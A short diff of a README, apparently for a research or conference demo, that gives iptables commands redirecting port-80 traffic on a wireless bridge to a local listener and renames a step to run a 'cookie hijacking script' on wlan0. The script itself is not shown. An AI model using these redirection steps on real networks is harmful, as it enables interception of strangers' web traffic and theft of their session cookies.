tahakhan5/oakland-demo/README.md

     `iptables -t nat -D PREROUTING 1`

     `iptables -t nat -A PREROUTING -p tcp --dport 80 -i br-lan -j DNAT --to 172.16.42.1:8000`
-1. Run the cookie capturing script with using the command below.
+1. Run the cookie hijacking script using the command below.
 Default interface for listening is `wlan0`

 ## Usage